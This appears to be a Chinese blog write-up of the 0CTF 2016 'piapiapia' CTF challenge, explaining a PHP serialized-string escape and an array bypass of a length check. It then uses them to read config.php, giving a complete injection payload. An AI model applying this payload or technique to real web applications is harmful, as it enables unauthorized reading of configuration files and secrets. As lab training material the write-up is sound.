[0CTF 2016]piapiapia(反序列化逃逸)

最新推荐文章于 2022-05-14 12:24:59 发布
最新推荐文章于 2022-05-14 12:24:59 发布
阅读量728 收藏 1
点赞数 2
分类专栏: Buuctf刷题篇 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49656607/article/details/120058039
版权

偷了三天懒没有学习,哈哈哈,通宵看完了扫黑风暴

开始做题

在这里插入图片描述
打开环境,第一时间以为是SQL注入,用sqlmap跑了一下,并不是
找了一下也没有什么东西,就去扫一下他的敏感目录,扫到www.zip,下载下来
先用Seay快速审计一下,再去细看代码逻辑
在这里插入图片描述

知识点

1、代码审计
2、反序列化逃逸

来一起看看代码吧

先看看可能存在文件读取的profile.php
在这里插入图片描述
首先想到的就是利用反序列化,然后文件读取,继续跟进
$profile = $user->show_profile($username);
再看index.php,就是正常登录
在这里插入图片描述
再看update.php,这里就存在文件上传了,而且注意到nickname其实是可控的,因为strlen是可以通过数组绕过长度的,而另外两个 if 判断是被写死了的
在这里插入图片描述
继续看class.php,主要还是利用update_profilefilter
在这里插入图片描述
在这里插入图片描述
我们需要的flag就在 config.php
在这里插入图片描述

整理一下思路

profile.php

$profile = unserialize($profile);
$phone = $profile['phone'];
$email = $profile['email'];
$nickname = $profile['nickname'];
$photo = base64_encode(file_get_contents($profile['photo']));

假如我们想办法让$profile['photo']等于config.php,是不是就可以通过文件读取拿到flag

update.php

if (preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
   die('Invalid nickname');
move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
$profile['phone'] = $_POST['phone'];
$profile['email'] = $_POST['email'];
$profile['nickname'] = $_POST['nickname'];
$profile['photo'] = 'upload/' . md5($file['name']);
$user->update_profile($username, serialize($profile));
echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';

这里我们就可以通过nickname来控制photo的值,从而造成逃逸

简单介绍一下逃逸的原理

比如说正常序列化后的语句是
a:4:{s:5:"phone";s:11:"15901010101";s:5:"email";s:11:"123@123.com";s:8:"nickname";s:3:"asf";s:5:"photo";s:6:"11.jpg";};
但是如果我的nicknameasf";s:5:"photo";s:10:"config.php";};而不只是asf,通过序列化又会变成什么呢
a:4:{s:5:"phone";s:11:"15901010101";s:5:"email";s:11:"123@123.com";s:8:"nickname";s:37:"asf";s:5:"photo";s:10:"config.php";};";s:5:"photo";s:6:"11.jpg";}
有没有注意到差别,我们传进去是nickname已经形成闭合,同时也把我们构造的config.php插进去了,而后面的photo部分则会丢失,反序列化时就形成了逃逸
在这里插入图片描述

回到题目

update_profile又调用filter方法检测过滤

    public function filter($string)
    {
        $escape = array('\'', '\\\\');
        $escape = '/' . implode('|', $escape) . '/';
        $string = preg_replace($escape, '_', $string);
        $safe = array('select', 'insert', 'update', 'delete', 'where');
        $safe = '/' . implode('|', $safe) . '/i';
        return preg_replace($safe, 'hacker', $string);
    }

我们的想法就是要插入";}s:5:"photo";s:10:"config.php";},一共34个字符,要逃逸成功只需要长度增加34,把我们的目标给挤出去就行了
这里正好利用filter来将长度增长,假如我传入 where,那么被替换以后就是 hacker,长度增加了1

payload,一共是34个 where
wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}

开始做题

首先抓个包,strlen可以通过数组绕过
在这里插入图片描述
在这里插入图片描述
上传成功,访问profile.php,这个图片就是config.php,base64解码拿到flag
在这里插入图片描述
在这里插入图片描述

paidx0
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
12-20
一个很可爱的登录界面: 进行一下目录扫描,发现源码泄露www.zip,把源码给出: index.php <?php require_once('class.php'); if($_SESSION['username']) { header('Location: profile.php'); exit; } if($_POST['username'] && $_POST['password']) { $username = $_POST['username']; $password = $_POST['password']; if(strlen($username
[0CTF 2016]piapiapia(字符逃逸详解)
最新发布
记录学习,一起进步
02-01 870
[0CTF 2016]piapiapia
[0CTF 2016]piapiapia
m0_62879498的博客
05-14 415
[0CTF 2016]piapiapia 进入环境,发现了登录页面 以为是注入类题目(主要是sql注入),一番尝试后却没有发现注入点 尝试使用 dirsearch 扫描目录 看看能有什么发现 发现了 网页源代码 www.zip 以及一系列php文件 访问 register.php 注册用户 注册登陆后 进入就是 update.php 文件 ,进行用户信息收集 提交信息后没有发现什么信息 下载网站源代码,进行代码审计 index.php和register.php 没有什么值得注意的地方 我们重点关
[0CTF 2016]piapiapia(反序列化逃逸)
羽的博客
03-01 3149
通过扫描后台目录获得了源码(www.zip)。解压出来发现出了登录之外还有注册和其他的目录。在config.php中发现了flag变量,看来题目目的是让我们读取config.php了。 我们来看下每个页面: 1 index.php,register.php: 这两个个是登录页面和注册页面,要求我们输入的用户名和密码的长度都在3-16内。 2 class.php: 在class.php中我们发现了过...
[0CTF 2016]piapiapia总结(PHP序列化长度变化导致尾部字符逃逸
qq_44657899的博客
04-30 1575
这道题感觉很难,要是比赛中出这种题我肯定做不来,所以我耐着性子慢慢分析这道题,最后居然自己做了个七七八八,只剩下一点点就完全做出来了。 下面把我做这道题时的思路一步一步记录下来,希望能够彻底巩固。 一,信息收集 拿到题没有什么思路,先找找线索,从源码和题目里没看到什么提示。 试了试万能密码登录也无果,然后试着扫目录和用burp抓包找提示。 发现有www.zip源码泄露。 二,分析源码 对于代码审...
[0CTF 2016] piapiapia 题解
lonmar的博客
01-27 721
反序列化字符逃逸
[0CTF 2016]piapiapia 详细解题思路及做法
EC_Carrot的博客
12-09 1282
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 进去是一个登陆界面,尝试sql注入,发现没什么用,但又没有其他功能了,只能扫描看看有没有源码泄露 这边用的是dirsearch,可以扫描出www.zip文件,但在BUUCTF里面做题需要设置延迟参数-x,不然扫描太快就全是返回429状态码。 在www.zip提供的源码里面主要有: index.php、profile.php、register.p
[0ctf2016]piapiapia
ro4lsc的博客
05-07 6962
[0ctf2016]piapiapia(PHP unserialize字符逃逸) 前言 由于自己还没接触过太多这类的题目,所以还是总结网上的WP进行复现,会尽可能写的清晰,那么话不多说,开始淦 首先使用了dirsearch扫了一下目录(网站源码泄漏www.zip) dirsearch -u "http://62bfe127-e775-4795-bf16-8cc039c1e9ab.node3.buu...
BUUCTF:[0CTF 2016]piapiapia
qq_46230755的博客
12-26 514
题目页面是一个登录页面。拿到题目第一步当然考虑一下有没有注入。当然经过几次测试答案是没有的。 利用工具扫一下是否存在其他的页面 果然扫到了一个www.zip 我们尝试一下进入注册的页面 注册一个admin 123456 进去里面看看,发现可以传东西,考虑是不是文件上传漏洞(事实证明没有) 随便传个东西,发现会跳转到另一个页面 回到一开始拿到的源码,发现config.php文件里存在flag,但是不可读 config(): <?php $config['hostname'] = '1.
web buuctf [0CTF 2016]piapiapia
weixin_44214568的博客
04-11 828
知识点:1.反序列化字符串逃逸 1.开题 2.常规操作,看源码,查看robots.txt,disearch扫描 抓包,用常规的sql注入测试了一下,没啥效果,disearch扫描也结束了,看了下disearch扫描 有文件www.zip,是源码的一个包,下载下来 3.查看源码,没有路由文件,从index.php看,加载了config.php(里面有flag值),profile.php(会话已经加载的情况下读取信息),都看了一下文件,register.php(注册),注册了一个账号试了试,链
[原题复现+审计][0CTF 2016] WEB piapiapia(反序列化、数组绕过)[改变序列化长度,导致反序列化漏洞]...
笑花大王
03-02 1283
简介 原题复现: 考察知识点:反序列化、数组绕过 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 漏洞学习 数组绕过 1.1 url传递数组当我们要向服务器传递数组时,我们可以通过 http://127.0.0.1/index.php?a[]=hello&a[]=world 来传递,这...
0CTF-2016-piapiapia(PHP反序列化字符逃逸)
crispr的博客
03-06 1230
0CTF-2016-piapiapia(PHP反序列化字符逃逸) 0x01 前言 开学果然是对更新博客没得想法,趁着闲工夫,做了一下这个题,之前XCTF新春赛也出现了PHP反序列化逃逸,不过没做出来。。tcl,直接看题吧。 0x02 正文 这个题直接给你登录页面了,F12没有发现,sql注入也不太像,一般出现登录页面都会有注册页面,字典跑起来,发现有regester.php、config.php...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值